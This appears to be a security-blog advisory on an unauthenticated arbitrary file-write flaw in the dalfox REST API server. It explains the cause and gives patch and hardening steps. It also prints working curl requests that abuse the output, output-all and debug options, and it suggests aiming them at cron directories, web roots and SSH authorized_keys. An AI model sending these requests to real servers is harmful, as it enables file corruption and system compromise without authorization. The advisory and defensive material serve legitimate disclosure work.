Listen to this Post
How the CVE Works (technical details):
The dalfox REST API server binds to `0.0.0.0:6664` by default with no API key required. The `postScanHandler` deserializes user JSON directly into model.Options, which includes the output, output-all, and `debug` fields. These fields are propagated unchanged through `Initialize()` into the scan engine. During logging, `DalLog()` attempts to open the path from `options.OutputFile` using os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644). This file write block is placed outside the `IsLibrary` guard, meaning it executes even in server/library mode where file output was never intended. The `ftext` variable becomes non‑empty when `options.Debug` or `options.OutputAll` is true – both attacker‑controlled. An unauthenticated attacker can therefore create or append to any file writable by the dalfox process. The log content includes the attacker‑supplied URL verbatim, offering partial content control. No authentication middleware is registered because `–api-key` defaults to "". The same lack of sanitization affects `OutputAll` and Debug. The file is never truncated, only appended, enabling corruption of existing configuration or system files.
dailycve form:
Platform: dalfox REST
Version: unspecified (default)
Vulnerability: unauthenticated arbitrary file
Severity: High (8.2)
date: 2026-05-12
Prediction: Patch within 30d
What Undercode Say:
Verify no auth required
curl -s http://127.0.0.1:16664/health
Exploit: create/append via output parameter
curl -X POST http://127.0.0.1:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://127.0.0.1:1/?x=1",
"options": {
"output": "/tmp/pwned.log",
"output-all": true,
"debug": true
}
}'
Watch file creation
tail -f /tmp/pwned.log
Exploit:
Send JSON with "output": "../../writable/path", "output-all": true, and "debug": true. No `X-API-KEY` header. Target sensitive locations like /etc/cron.d/, web roots, or `~/.ssh/authorized_keys` (appending harmless log lines breaks parsers but proves write).
Protection from this CVE
- Strip dangerous fields in `postScanHandler` before
ScanFromAPI: setrq.Options.OutputFile = "",OutputAll=false,Debug=false. - Guard file write inside `else` branch of `IsLibrary` in
DalLog(). - Require `–api-key` on server startup; reject empty keys.
- Run dalfox as a low‑privileged user and restrict filesystem writes via container/AppArmor.
Impact:
- Arbitrary file creation anywhere the dalfox process can write.
- Append/corruption of existing files (configs, cron, logs).
- Partial content injection via the scan URL.
- No authentication needed by default; if run as root, full system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

